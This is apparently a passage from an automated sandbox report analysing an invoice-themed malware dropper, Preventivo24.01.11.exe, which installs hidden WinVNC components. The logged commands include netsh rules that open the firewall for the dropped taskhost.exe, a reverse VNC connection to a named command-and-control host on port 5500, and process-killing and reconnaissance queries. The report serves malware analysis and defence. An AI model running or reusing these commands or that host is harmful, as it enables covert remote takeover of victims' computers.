A,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProces
Source: C:\Games\taskhost.exeCode function: wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProces
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009A4836
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009A4942
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009700AC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_00970251
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01002440
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E81490
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAF6F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC5910
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FD7CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FD3C50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0101C3F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01020210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EBE4E0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010AC5E2
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0109A7D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EB6600
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EB2743
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010A29F3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01018800
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0106CA10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EC2BA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0102CA50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01092DEE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EB4E40
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01020FB0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0100CED0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0109317C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAB090
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAF180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA3390
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E83480
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01029470
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01073650
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EBF740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC3750
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0101DA00
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F99B50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F03B10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E87AA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0101FFD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAFF50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0101DEF0
Source: C:\Games\viewer.exeCode function: 6_2_006167A0
Source: C:\Games\viewer.exeCode function: 6_2_00640040
Source: C:\Games\viewer.exeCode function: 6_2_0063E0E0
Source: C:\Games\viewer.exeCode function: 6_2_00649151
Source: C:\Games\viewer.exeCode function: 6_2_0063B1CB
Source: C:\Games\viewer.exeCode function: 6_2_0061C340
Source: C:\Games\viewer.exeCode function: 6_2_0063B3FD
Source: C:\Games\viewer.exeCode function: 6_2_006367B0
Source: C:\Games\viewer.exeCode function: 6_2_00651804
Source: C:\Games\viewer.exeCode function: 6_2_006418B4
Source: C:\Games\viewer.exeCode function: 6_2_00651924
Source: C:\Games\viewer.exeCode function: 6_2_0061DD00
Source: C:\Games\viewer.exeCode function: 6_2_0064FDE4
Source: C:\Games\viewer.exeCode function: 6_2_00654EF0
Source: C:\Games\viewer.exeCode function: 6_2_0061FF00
Source: C:\Games\viewer.exeCode function: 6_2_00649F09
Source: C:\Games\taskhost.exeCode function: 41_2_00162820
Source: C:\Games\taskhost.exeCode function: 41_2_0015F0D0
Source: C:\Games\taskhost.exeCode function: 41_2_001DA974
Source: C:\Games\taskhost.exeCode function: 41_2_000BD9F0
Source: C:\Games\taskhost.exeCode function: 41_2_001E5A2B
Source: C:\Games\taskhost.exeCode function: 41_2_0015FA50
Source: C:\Games\taskhost.exeCode function: 41_2_001C4362
Source: C:\Games\taskhost.exeCode function: 41_2_001E23F9
Source: C:\Games\taskhost.exeCode function: 41_2_001CA650
Source: C:\Games\taskhost.exeCode function: 41_2_000BD700
Source: C:\Games\taskhost.exeCode function: 41_2_001C3FD4
Source: C:\Games\viewer.exeCode function: String function: 00635126 appears 56 times
Source: C:\Games\viewer.exeCode function: String function: 00635630 appears 40 times
Source: C:\Games\viewer.exeCode function: String function: 006350F2 appears 93 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00E8A880 appears 58 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00E8AEE0 appears 67 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00E887F0 appears 50 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00E89320 appears 120 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: String function: 00EA5220 appears 35 times
Source: C:\Games\taskhost.exeCode function: String function: 000BCCB0 appears 34 times
Source: Preventivo24.01.11.exeStatic PE information: invalid certificate
Source: taskhost.exe.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskhost.exe.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Preventivo24.01.11.exe, 00000000.00000003.1685751474.0000000007E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVNCHooks.dllH vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000000.1638029413.000000000120B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685248284.0000000007E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685666367.0000000007E1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685503614.0000000007E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B101000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exeBinary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeSection loaded: lpk.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeSection loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
Source: Preventivo24.01.11.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: shi6E82.tmp.0.drBinary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
Source: timeout.exe, 00000036.00000002.2263167469.0000000000658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .CMD;.VBP~
Source: classification engineClassification label: mal76.rans.troj.evad.winEXE@110/77@8/5
Source: ~.pdf.0.drInitial sample: http://www.pdf-tools.com\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC0AF0 FormatMessageW,GetLastError,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF4BE0 GetDiskFreeSpaceExW,
Source: C:\Games\viewer.exeCode function: 6_2_00613710 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,
Source: C:\Games\viewer.exeCode function: 6_2_006149C0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E8A740 LoadResource,LockResource,SizeofResource,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax VnJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Games\taskhost.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\upd65B7.tmpJump to behavior
Source: C:\Games\viewer.exeCommand line argument: Ae
Source: Preventivo24.01.11.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Preventivo24.01.11.exeVirustotal: Detection: 17%
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile read: C:\Users\user\Desktop\Preventivo24.01.11.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Preventivo24.01.11.exe C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Source: unknownProcess created: C:\Games\viewer.exe C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
